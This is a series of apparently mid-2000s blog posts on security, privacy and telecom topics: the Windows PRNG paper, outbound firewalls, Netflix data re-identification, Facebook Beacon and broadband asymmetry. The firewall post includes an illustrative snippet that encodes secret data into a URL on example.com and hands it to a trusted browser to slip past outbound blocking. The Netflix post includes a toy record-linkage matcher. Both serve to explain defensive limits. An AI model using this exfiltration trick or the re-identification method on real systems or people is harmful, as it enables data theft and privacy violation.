Windows randomness – the sky is not falling yet

A recent paper at CCS reported problems in the Windows 2000 random-number generator. The story made it to Slashdot and was later amplified in the blogosphere, after MSFT confirmed that the same problem applied to XP. One lone voice of reason on Slashdot tried in vain to clear the air, while speculation continued on whether the entire edifice of Windows cryptography had been undermined. MSFT itself did not help the case by taking issue with the definition of “vulnerability” while still announcing a change to the functionality in XP SP3.

This blogger’s two cents’ worth of observations on the subject:

  • The most glaring problem with the paper is an unrealistic threat model. The attack requires complete access to the internal state of the random-number generator. In a typical setting the adversary can observe the output of a PRNG but cannot peek inside the black box to see what is going on. As such this work is closer in spirit to the side-channel attacks against OpenSSL or the x86 shared-cache problem, which also have the prerequisite that the adversary has additional visibility into the operation of the system.
  • In this case the authors assumed a very powerful adversary, one who has exploited a remote-code-execution vulnerability to gain complete control of the application. (“Buffer overrun” is used as a proxy for this in the paper, although fewer of these vulnerabilities are exploitable for code execution owing to the proliferation of compiler and OS mitigations.) The problem is, once the attacker is running code on the system with the privileges of the application using the PRNG, they have complete control and many options. There may be no reason to attack the PRNG at this point: they can directly read any keys lying around in memory, access plain-text encrypted or decrypted with those keys, etc. This is equivalent to observing that once a burglar can break into a house, the fact that the owner did not shred all the documents may be quite irrelevant if the same information can be obtained elsewhere in the residence.
  • Once the internal state of a PRNG is known, predicting future output is trivial until the generator is rekeyed or supplied with fresh entropy from a pool. No PRNG is secure against this. So the incremental risk presented by the attack applies to one scenario only: a system is 0wned after it has generated, used and discarded key material using the PRNG, but before the PRNG state has been reinitialized. In this window the PRNG state allows recovering keys that would otherwise not have been reachable (the “forward security” property). Any earlier and the attack is irrelevant, because the keys generated with the PRNG are still around in memory and can be read directly, without having to rewind the PRNG state. Any later and the PRNG state is lost irreversibly. That’s a narrow window of opportunity for carrying out this attack, on top of successfully exploiting a remote-code-execution vulnerability.
  • A similar lack of perspective around system security continues into the discussion of isolation boundaries. There is an extended discussion on the benefits of kernel vs. user mode as if that were a meaningful security boundary. Code running as administrator can trivially obtain kernel privileges in all versions of Windows prior to Vista (by programmatically loading a device driver) and read the same PRNG state from the kernel. Conversely, the PRNG can run in user mode but in a different process such as lsass – which is also how key isolation works in Vista for private keys. In fact the user/kernel distinction does not hold in Linux either: root can directly read kernel memory.
  • For this reason, having separate processes each running their own PRNG can be good for security, contrary to the argument in the paper. Compromising the state of one does not reveal information about any other process. For example, exploiting a buffer overrun in the IIS service does not reveal the PRNG state of the process that handles SSL negotiation – which, surprisingly, is not IIS. This is consistent with the isolation between accounts provided by the OS.
  • There is an estimate of 600 SSL handshakes required for refreshing client state, and a cavalier assertion to the effect that this number is unlikely to be reached in practice. In fact, for SSL servers under load (the highest-risk case) 600 connections are easily cycled within a matter of minutes. As for clients, a quick peek at SSL usage on the web shows that most large services do not use SSL session resumption – because servers are load-balanced and a client could end up going to any one of hundreds of identical servers. So even logging into email once over SSL involves dozens of SSL handshakes from scratch, one for every object accessed (including images and other non-essential data embedded on the page), each exercising the PRNG.
  • The authors reverse-engineered W2K code and yet keep referring to it as the “world’s most popular RNG,” even after citing the statistic that its market share is in the single digits. Due diligence would have suggested looking at XP, 2003 Server and Vista before making these claims. Vista in particular has two completely independent cryptography implementations: CAPI, which has existed since the earliest versions of NT, and Crypto Next Generation or CNG, new in Vista. Not only do they not share code for the underlying primitives, but even the respective interfaces are incompatible. In the end W2K3 and Vista proved not to be vulnerable.
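The state-compromise scenario in these bullets can be made concrete with a toy generator. This is purely an illustration, not the Windows design: once the internal state is captured, all output until the next reseed is predictable, while a one-way state update is what keeps already-discarded output safe – the forward-security property at issue in the paper.

```python
import hashlib

class ToyPRNG:
    """Toy hash-chain PRNG; NOT the Windows design, just an illustration."""
    def __init__(self, seed: bytes):
        self.state = seed

    def next_bytes(self) -> bytes:
        # Output is derived from the current state...
        out = hashlib.sha256(b"out" + self.state).digest()
        # ...then the state is advanced with a one-way function,
        # so a later state snapshot cannot be rewound to past output.
        self.state = hashlib.sha256(b"next" + self.state).digest()
        return out

    def reseed(self, entropy: bytes):
        self.state = hashlib.sha256(self.state + entropy).digest()

victim = ToyPRNG(b"initial entropy")
victim.next_bytes()                 # some keys already generated and discarded

attacker = ToyPRNG(b"")             # attacker snapshots the internal state
attacker.state = victim.state

# Future output is now fully predictable...
assert attacker.next_bytes() == victim.next_bytes()

# ...until fresh entropy is mixed in, closing the window of opportunity.
victim.reseed(b"fresh entropy")
assert attacker.next_bytes() != victim.next_bytes()
```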

Bottom line: rumors of the complete breakdown of CAPI may have been slightly exaggerated.

cemp

Bandwidth asymmetry in US broadband (2/2)

Here is a recap of the challenges associated with remotely accessing computers at home behind a typical broadband connection:

  1. The operating system. Most common versions of Windows have few built-in features to act as a server. Remote Desktop is the only one that works out of the box, and even that is of limited value because of licensing stipulations: a remote user will log out the interactive one on XP Professional and all Vista editions. Only the server SKUs, rarely found installed on end-user machines, support concurrent logon sessions. Even that one remote connection is out of the question on XP Home edition, where third-party VNC solutions are the only way to access the machine remotely. IIS is available as an optional add-on for most SKUs. Linux and Mac OS X are better in this respect out of the box, since they are traditionally used for both client and server roles. But none of these amounts to an easy-to-use, secure remote-access/sharing solution for novice users.
  2. Firewall interference. Not only does the OS lack server-side applications, it gets in the way of others with the default firewall configuration. The personal firewall is an important security feature introduced in Windows XP and significantly strengthened in XP SP2. Its deployment coincided with the rise of botnets, when reports were circulating that a Windows machine attached to an always-on broadband connection would be 0wned in a matter of minutes. This reality informed the decision to block most inbound ports. (Fortunately applications adjusted – after installation they silently opened the necessary ports by changing firewall settings, a trick that stopped working when Vista introduced the largely inane UAC feature.)
  3. Home networking configuration. The standard configuration for most home networks involves a wireless router in the mix, behind a cable/DSL modem. This means the PCs are not directly exposed at the Internet egress. Good for security, but more hoops to jump through for using the system remotely. Routers typically have a built-in web UI which can be used for setting up port forwarding. On the off chance that users managed to get past the first two hurdles, this is where they could stumble. The number of routers that support UPnP is an encouraging sign here, as that protocol can be used to dynamically open up external-facing ports.
  4. ISPs. Finally, the biggest obstacles are the Internet service providers themselves. For all the advances in infrastructure, upstream bandwidth remains a scarce commodity. For example, here in Manhattan the standard Time-Warner package provides 10Mbps downstream and 512kbps upstream – a factor of 20x. In the most “equitable” scenario, our previous provider in Central Florida offered 9Mbps down/1.5Mbps up. On top of the constrained bandwidth there is port blocking, often couched in the language of security and intended to confuse users. For example, blocking port 25 has certainly helped stem the tide of spam originating from zombies, but it also prevents users from hosting their own email server at home. Similarly, inbound port 80 is often blocked to preempt web servers operating out of the basement – at least without shelling out for a “business class” subscription from the ISP.
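The asymmetry in the last item is easy to put in numbers, using the figures quoted above (and taking 1 Mbps = 1,000 kbps):

```python
def ratio(down_kbps: float, up_kbps: float) -> float:
    """Downstream-to-upstream bandwidth ratio."""
    return down_kbps / up_kbps

# Time-Warner Manhattan: 10 Mbps down, 512 kbps up
print(round(ratio(10_000, 512), 1))   # -> 19.5, roughly the 20x quoted above

# Central Florida: 9 Mbps down, 1.5 Mbps up
print(round(ratio(9_000, 1_500), 1))  # -> 6.0
```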

The result of these policies has been the imposition of a double standard on broadband subscribers. They are expected to consume content originating elsewhere; copious amounts of bandwidth are available for this, and ISPs are falling over themselves trying to provide exclusive content in an attempt to move up the value chain. But customers are discouraged from participating in the distribution of content, or even accessing their own resources remotely.

cemp

Windows Live ID ships identity-linking

It is great to see that the Windows Live ID service went live with the “linked identities” feature recently. (Full disclosure: this blogger worked on the security review for the design.) Linked IDs were introduced to deal with the problem of juggling multiple identities. It’s well known that, due to the lack of interoperability between web service providers, users end up registering for multiple accounts: one for Google, one for Yahoo, one for MSN/Windows Live, etc. This is a necessity because services available to one ID, such as instant messaging a particular group of friends, are not available to the others. Recent steps towards limited interoperability are encouraging and may decrease the need for that proliferation long term.

But less frequently acknowledged is the notion of personas, where users create multiple identities with the same Internet service provider. In this case the issue is not missing functionality or fragmented networks, but the desire to maintain separation between aspects of one’s online activities. theodoregeisel@hotmail.com may have exactly the same capabilities as drseuss@hotmail.com, but the user in this case presumably made a conscious decision to keep them distinct. Perhaps they even want to discourage contacts from discovering the correlation between the two. Less contrived examples are keeping different accounts for personal and work use, or interacting with casual acquaintances versus expressing an alter ego in the presence of good friends.

The challenge for these users is managing the multiple accounts. Typically web authentication systems have the notion of a single identity that can be expressed at a time. This is often mistakenly ascribed to a limitation of web browsers, namely the existence of a single global “cookie jar” where the cookies that correspond to authentication state are kept – not true, as evidenced by the linking feature, and for that matter by Google being able to sustain both an enterprise ID and a user ID at the same time. That leaves the user constantly logging in and out of accounts in order to manage both. Aside from being frustrating, this breaks convenience features built into the authentication system, which generally assume a single account. For example, the various implementations of “keep me signed in” / “remember me” work for only one account: logging out of that account and signing in with another clears the saved credential. (Actually it is more complicated: technically, passwords can be remembered by client-side software, including the web browser, and these are generally capable of storing multiple credentials. Smart clients are not limited to the one-user rule, and even for web scenarios there is an exception with Windows Live ID login for Internet Explorer when the helper ActiveX control and BHO are installed.)

Linked identities provide an effective solution to this problem. The user proves ownership of both identities by entering the password for each on the same Account page. This creates a permanent association between the two identities. From that point on, when the user is logged in to one account, they can quickly switch to the other using a menu in the upper-right corner of the shared banner that appears across the top of most Live services. No logout, no additional credential prompts. The linking operation is symmetric, more than two accounts can be linked, and the links can be revoked by the user at any time in the future. The feature can be experienced first-hand at the Hotmail website by all existing users. Congratulations to the team on this milestone.
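The linking semantics described above – symmetric, multi-account, revocable – can be modeled in a few lines of code. This is a plausible sketch of the data model only, not the actual Live ID implementation, and the account names are invented:

```python
class LinkedIDs:
    """Toy model of symmetric, revocable identity linking (illustrative only)."""

    def __init__(self):
        self.groups = {}  # account -> shared set of mutually linked accounts

    def link(self, a: str, b: str):
        # In the real service this step requires proving ownership of
        # both accounts by entering both passwords on the Account page.
        merged = self.groups.get(a, {a}) | self.groups.get(b, {b})
        for acct in merged:
            self.groups[acct] = merged  # every member shares one set

    def unlink(self, a: str):
        group = self.groups.pop(a, {a})
        group.discard(a)  # remaining accounts stay linked to each other

    def switch_targets(self, a: str):
        """Accounts the banner menu would offer for quick switching."""
        return sorted(self.groups.get(a, {a}) - {a})

ids = LinkedIDs()
ids.link("drseuss@hotmail.com", "theodoregeisel@hotmail.com")
ids.link("drseuss@hotmail.com", "work@example.com")  # more than two accounts
print(ids.switch_targets("theodoregeisel@hotmail.com"))
# -> ['drseuss@hotmail.com', 'work@example.com']
```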

cemp

Bandwidth asymmetry in the US broadband market (1/2)

Back in the 1990s, pundits speaking of the “information super-highway” liked to contrast its interactive nature with TV, emphasizing how much better off we were going to be because the new medium works two ways. TV was old school, making us passive recipients of content, our expressive powers limited to choosing one pre-packaged experience over another. On the Internet everybody was going to be a participant, creating content.

The prediction proved correct to some extent, as evidenced by the popularity of user-supplied content in Web 2.0, whether it takes the form of rambling blogs, blurry photographs named DSC001 on Flickr or, more recently, the fifteen-minutes-of-fame video on YouTube. But in this world, contributing to the proliferation of content noise out there still requires help from another well-financed entity: the blogging site, the photo-sharing website, etc.

For the most part users are not running their own servers at home. There is technology available for this, often open-source/free and to varying degrees usable by novice end-users. But there are good reasons for using a professional hosting service: it benefits from economies of scale and ease of management, and gives users a host of features – including 24/7 reliability, backups, etc. – that would be difficult to implement at home. For one-to-many sharing, where the user is publishing “public” content intended for a large number of people to access, it makes sense to upload it to a central distribution point. For private content, it is not as clear-cut. If your tax returns are stored on a home PC and the goal is to work on them from a different location, a direct connection to the machine is the straightforward solution. The popular GoToMyPC app is one of the commercial solutions that have emerged in response to this demand. In principle the file-access scenario has an equivalent hosted solution, where you can upload your files to a service in the cloud such as Windows Live Drive. But it’s easy to craft scenarios where that is not true: if the home PC has an expensive application such as Photoshop installed locally, the only way to use that software is remote access. Similarly, the disruptive technology in SlingBox, which streams cable/TV/DVR content over the Internet, requires direct connectivity – in this case to the appliance, using it as a server hosted at home. Last year Maxtor debuted the Fusion, a new external drive with networking support and a built-in capability for sharing files over the Internet using links in email messages.

This is where the triad of OS developers, networking equipment vendors and ISP business models conspire to make life very difficult for consumers.

(continued)

cemp

Real-estate agents: deceptive practices even in strong markets

Combine two ingredients:

1. The real-estate business is not exactly known for transparency and integrity. In spite of strict regulations – such as legal obligations to disclose known defects and record all transactions publicly – deceptive advertising, distorted perception and a Ponzi-scheme mentality remain hallmarks of the industry. (Some of the subtle ways an agent works against the interests of the client, pressuring sellers to accept lower offers and buyers to bid higher, were chronicled in Freakonomics.)

2. New York metropolitan-area real estate remains one of the few islands of stability and uninterrupted irrational exuberance in the midst of a sobering, country-wide correction after a decade-long, unsustainable bubble in housing prices. Manhattan remains strictly a seller’s market, including in rentals.

It’s no surprise that brokers resort to questionable practices trying to move units. This also explains why Craigslist, that venerable free resource, has been rendered completely useless for Manhattan, flooded with hundreds of bogus listings for non-existent apartments meant for bait-and-switch scams, and otherwise useless, content-free classifieds describing IN ALL CAPS why this apartment will not be on the market very long. It goes to prove that sometimes “free” is not a good thing: charging people to place ads would go a long way toward assuring quality control and improving the signal/noise ratio.

Consider the following blurb from a contract that must be signed before brokers are willing to show apartments:

“You understand that the commission charged by [brokerage firm] for the aforesaid services is 15% percent of the first year’s rent … payable to [firm] only if you rent in a building or complex shown to you by [firm] within 120 days of such showing.”

This contains an ambiguous case: broker Bob shows unit #123 in a building, which does not work out. Later broker Alice from a different firm shows apartment #456 in the same building, which the customer decides to take. Is Bob’s firm owed any commission? From the blurb above, the answer seems to be in the affirmative; in this case “Bob” continued to insist that it was not. In fact it is very much in the interest of the brokerage firm to have this over-reaching clause. It’s perfectly fair game to insist that a customer utilizing the services of an agent should properly compensate the firm. On the other hand, by extending the claim to include all units and effectively “tainting” the building for four months, the company achieves a lock-in effect. Bob would also insist this is not an exclusivity agreement, which is strictly speaking correct: it does not rule out working with another broker, it only creates strong economic incentives against doing so for the same building.

The pragmatic solution, which worked in this case: different brokers for each neighborhood. This makes sense anyway, because real estate remains a very old-fashioned business where personal connections matter, and it’s unlikely that the same person has developed strong networks in all areas.

cemp

Crossing the line on privacy: Facebook story

It was a case of conventional wisdom at odds with itself.

The information security community has long maintained a very glib outlook on privacy: on the one hand embracing such enablers of paranoia as Tor, offshore data-havens and untraceable e-cash, on the other hand griping about the indifferent, cavalier attitude most users have towards their own personal information. The failure of privacy-enhancing technologies to break into the mainstream has a consistent history, from PGP to the failure of Zero-Knowledge Systems to commercialize its network.

At the same time, Facebook was the new poster child for Web 2.0 applications: the social network threatening to overtake MySpace, flush with cash after recently inking a lucrative advertising deal with MSFT, having sat in the middle of a bidding war against Google. It could do no wrong, and certainly not in such a trivial area as privacy. Scalability, performance, features – this is what makes or breaks social networks, as Friendster found out the hard way.

It turned out users did care about privacy after all. Long before the popular outcry, critics such as Cory Doctorow were writing blistering reviews of the Facebook business model, referring to its view of users as “bait for the real customers, advertising networks.” It did not take very long for popular sentiment to catch up. The Beacon feature crossed the line from dubious monetization strategy into outright abuse of customer data. At its core Beacon was a data-linking scheme: Facebook partnered with several prominent e-commerce merchants, including Amazon, Blockbuster and Fandango, to access the transaction history of users at these external sites. This data stream, which included purchase history, was incorporated into the user’s feed, visible to other users. (A challenge, considering that there is no shared identity spanning these sites – the email address would have been the only link, which is good enough for advertising purposes.) In effect, every time users bought anything at one of these merchants, they became unwitting walking billboards, advertising to other users what they purchased and where.

A great value proposition for merchants on the face of it: through a process of viral marketing, friends can be inspired to click on the link and visit the same merchant to purchase the identical item, in a game of keeping-up-with-the-Joneses played out on a social network. Meanwhile, those users particularly drawn to cataloging their material possessions online would have the data stream automatically generated. At least that must have been the elevator pitch in some PowerPoint presentation that inspired this scheme. One minor detail: viral marketing depends on willing participants who are impressed with the product and voluntarily rave about it to their contacts. Creating the appearance that users implicitly endorse everything they have bought is a non-starter, and forcing the endorsement to be carried out in a very public way demonstrated complete disregard for privacy.

A group of users 50K strong petitioned, more bad PR followed, and eventually Facebook changed the feature from opt-out to opt-in. This is a very unusual and perhaps encouraging demand for privacy: even in the original flawed design users had the option to disable the involuntary enrollment into the advertising program, but they stuck to the principle that meaningful consent must exist before people unwittingly become part of a dubious business plan with no clear value proposition for them. The storm is not over yet: a CNET article reports that the EFF and CDT are planning to file complaints with the FTC. Meanwhile Fortune/CNN is running a piece arguing that mismanaged PR and disregard for privacy are seriously damaging the company’s future prospects. Next up: damage-control time.

cemp

Netflix prize data and the meaning of anonymity

Last week a paper from the University of Texas titled “How to Break Anonymity of the Netflix Prize Dataset” was Slashdotted. In the ensuing discussion, parallels were drawn to the release of AOL search data, and questions were raised about whether this would finally put the kibosh on any future release of user data for research purposes. The results are very interesting but do not quite point to such a drastic conclusion. In particular, the notion of “anonymity” used in the paper, satisfactory from a mathematical point of view, is not consistent with the operative definition most users have in mind.

To recap: in 2006 Netflix announced a one-million-dollar prize for improving its recommendation service. The problem is deceptively simple to state: given past movie ratings from a user, suggest other movies he/she will enjoy. This is a standard collaborative-filtering and machine-learning problem, and the solutions depend on access to massive amounts of training data. More data allows the algorithms to understand user tastes at a very nuanced level and improve their predictions. Netflix was up to the challenge, releasing a very large dataset containing 100 million ratings from half a million users – almost one out of every eight customers at the time. This dataset was “anonymized” according to the Netflix definition: customers were identified by numbers only – no names, no personally identifiable information, not even demographic data such as age, gender or education, which may actually have been useful for predictions.

On the surface, the new paper shows that users can in fact be identified from this stripped-down data – this is the interpretation which fueled the Slashdot speculation. Reality is more complex. The main quantitative result from the paper is that the movie ratings of an individual are highly unique: no two people have closely matching sets of ratings. (The dataset is “sparse,” to use the proper language.) In fact they are so unique that there are unlikely to be two people who agree in their ratings for even a handful of movies. The effect is even more pronounced when the movies are obscure – knowing that a user watched an obscure Ingmar Bergman movie sets them apart from the crowd.

Looked at another way: suppose there is a large source of movie ratings, as in the Netflix prize dataset. If the goal is to locate a particular user whose identity has been masked, getting hold of just a few of their ratings from another source will be enough. Even among millions of users, there is unlikely to be a second person with the exact same tastes. In some ways this is intuitive, but the important contribution of the paper is quantifying the effect and calculating exactly how much data is required for unique identification with high confidence. The answer: less than a dozen movie ratings – fewer if the movies are obscure or if the dates the user watched them are also available. (Indirectly the latter is in the Netflix dataset, as the date the user provided a rating.)
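The matching step can be sketched in a few lines. The records below are invented, and the actual paper uses a more careful weighted scoring that tolerates fuzziness in ratings and dates; but even this naive version shows why sparsity makes a handful of known ratings identifying:

```python
# Anonymized records: customer id -> {movie: rating}. Data is invented.
dataset = {
    1234: {"Persona": 5, "Wild Strawberries": 4, "Spider-Man": 3},
    5678: {"Spider-Man": 5, "Shrek": 4, "Titanic": 5},
    9999: {"Titanic": 2, "Shrek": 3, "Persona": 1},
}

def best_match(aux: dict, dataset: dict) -> int:
    """Return the record id agreeing with the most auxiliary ratings."""
    def score(record: dict) -> int:
        return sum(1 for movie, r in aux.items() if record.get(movie) == r)
    return max(dataset, key=lambda cid: score(dataset[cid]))

# Two ratings for obscure titles, scraped from a (hypothetical) public
# profile elsewhere, already single out one record in this toy dataset:
aux = {"Persona": 5, "Wild Strawberries": 4}
print(best_match(aux, dataset))  # -> 1234
```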

“From another source” is the critical caveat above. In the paper this is referred to as the auxiliary data source. What the paper demonstrates is that the Netflix dataset can be linked to another dataset. Linking can be a serious privacy problem: it allows aggregating information from different databases. If a database existed where personally identifiable information was stored along with a small number of movie ratings, that record could be matched against the Netflix data. That is the catch: there is no such database. As the auxiliary source for mounting the attack, the paper uses the Internet Movie Database, or IMDB, where users volunteer movie reviews. That allows correlating the data on IMDB for a user with all of that user’s other ratings from Netflix. As for the typical user profile on IMDB: the registration page asks for email address, gender, year of birth, zip code and country – all of them volunteered by the user and subject to no validation. This is the “90210” phenomenon: any time data is mandatory without good reason and there is no way to enforce accuracy, the service provider ends up with many people named “John Smith” living in zip code 90210. That means the effect of linking IMDB and Netflix data is to discover that the user nicknamed MickeyMouse is a fan of Disney movies. Unless the user volunteered more data to IMDB, the correlation does not get us any closer to that subscriber’s offline identity. All the arguments about inferring sensitive information from movie ratings still hold (for example, political affiliation based on responses to a controversial documentary), but the data is now associated with user “MickeyMouse” instead of user #1234 in the original source. A step closer to identification? Perhaps. Fully identified? Not even close.

By itself the Netflix dataset is not dangerous. That is a sharp contrast to the earlier AOL search-data disaster: search history is sufficient on its own to uniquely identify users, because individuals enter private information into search queries, such as their legal name or address. More importantly, there is no limit to what search logs can contain: queries for health conditions can be used to infer medical data, searches for news may suggest professional interests, etc.

cemp

Buffalo Technology is latest target of IP litigation

Visitors looking for wireless products on the Buffalo Technology website are instead greeted with this message:

Regrettably, the Court of Appeals has decided not to stay the injunction in the CSIRO v. Buffalo et al litigation during the appeal period. Although Buffalo is confident that the final decision in the appeal will be favorable and that the injunction will be lifted, Buffalo is presently unable to supply wireless LAN equipment compliant with IEEE 802.11a and 802.11g standards in the United States until that decision is issued.

Fortunately this does not impact customers who have already bought devices: manuals and firmware updates are still available even for the verboten product lines. Interestingly enough, the injunction only covers A and G devices, so a pure draft-N router would still qualify in principle. But since all draft-N routers also have A/B/G support for backwards compatibility, this stops Buffalo from shipping any wireless product for all intents and purposes. It’s not clear what the impact on the company will be. They have a diversified line of products, including external drives, network-attached storage and even multimedia, but the current litigation might affect even some of those devices, such as wireless print servers.

cemp

Security theater, act#48: outbound blocking firewalls for PCs

Users running XP SP2, Vista or a third-party firewall client such as ZoneAlarm have probably seen this warning: “… such-and-such program attempted to make a connection to the Internet and was blocked.” This is supposed to create a warm and fuzzy feeling: here is messaging indicating that some shady application running on your computer attempted to do something sketchy, but the clever security system caught it and prevented harm. The reality is a bit different.

First, to be clear: firewalls are very important for defense in depth. (Although there are alternative security paradigms, such as the Jericho Forum, that seek to dispense with them altogether.) The main function of a firewall is to block inbound connections – in other words, to stop other computers “out there” in the wild, wild web from accessing resources on the machine “here.” Used this way, the firewall is the first line of defense; even when the access attempt seems harmless – “surely it would be denied!” – there is no reason to take risks. Exploitable bugs in access-control software have caused machines to be compromised simply by connecting to them. The further upstream one can detect and block an attack, the better.

But outbound blocking is an altogether different function. In this case there is some software already running inside the trust boundary, admitted into the inner sanctum, and the firewall prevents that code from communicating with the outside world. What purpose does that serve? With the exception of parental controls – which is rarely the intended use – the answer is “not much.” The reason is that outbound blocking assumes malicious intent on the part of the application: perhaps it is trying to connect to some nefarious host out there and do something dubious, such as ship private user documents off to Russia or download more malware. The problem is that once malicious code is running with the same privileges as the user, it is very hard to cut off all of its communication channels to the outside world, for one basic reason: processes and applications do not have strong identity.

While the host-based firewall attempts to create the illusion that application X is highly regarded and application Y is not to be trusted with talking to the outside world, in reality it has a very hard time telling them apart. This is because applications are not intended to be an isolation boundary in an operating system; they are not protected from each other. A simple example: if Y is not allowed to open an outbound connection, it can often launch a copy of X to do the same thing – or, prior to Vista, subvert the internal workings of X. For “X” substitute Internet Explorer: launching a URL is sending information to a website. In fact malware authors have already implemented a more reliable form of this strategy: when they need to phone home, say to download a new copy of the botnet software, they use the Background Intelligent Transfer Service (BITS), as documented by Symantec. BITS is a trusted operating-system component and has no problem bypassing the firewall, even when acting under orders from malware. There was a minor stir when this news initially surfaced, including articles at the Register and the BBC. In fact it should have been greeted with a yawn, were it not for the firewall itself setting unrealistic expectations about what can be accomplished in the way of outbound blocking.
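The “launch a trusted program to do your talking” trick can be sketched harmlessly. Suppose an outbound policy trusts only the browser: a blocked program can simply pack its data into a URL and hand it to the allowed process. The destination below is the reserved example.com domain, and the URL is never actually fetched:

```python
import base64
import urllib.parse

def exfiltration_url(secret: bytes) -> str:
    """Encode arbitrary data into an innocuous-looking URL query string."""
    payload = base64.urlsafe_b64encode(secret).decode()
    return "https://example.com/search?" + urllib.parse.urlencode({"q": payload})

url = exfiltration_url(b"private document contents")
print(url)
# A blocked process could now hand this URL to a whitelisted browser, e.g.:
#   subprocess.run(["firefox", url])   # the firewall sees only the browser
```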

cemp

Verizon changes the tune

The tune around open access, that is.
After suing the FCC over the spectrum-auction rules, the wireless carrier decided to reverse itself and embrace an open network. This is an unusual move, because until now telcos have jealously guarded access to their channels. Not content to be passive data pipes over which other people build higher-margin services, they have been trying hard to move upstream in the value chain. Keeping tight control over the devices that can connect to the network is one way to fend off potential competitors in this already difficult uphill battle.

Verizon points to the innovation that will result from lower barriers to entry, and this story makes for very good PR on paper. Not that the business side will necessarily suffer from this act of altruism – if the vision is realized, the new devices and services will drive more customers, who will still be paying Verizon $$$ for air-time. In that sense the only downside is the loss of incidental revenue from sales of phones and other equipment. But considering these were heavily subsidized to start with, the only collateral damage may be the close relationship with Motorola, Nokia, LG and the other manufacturers, who will lose their lock-in on Verizon customers.

That said, until other telcos allow their customers to use existing devices on a competing network – something they have no incentive to do and, unlike in Europe, no legal obligation to provide by unlocking phones – this is still one hand clapping. Any increased customer choice will have to come from new devices yet to be designed, not from the ability to use an existing device from another provider on the network.
cemp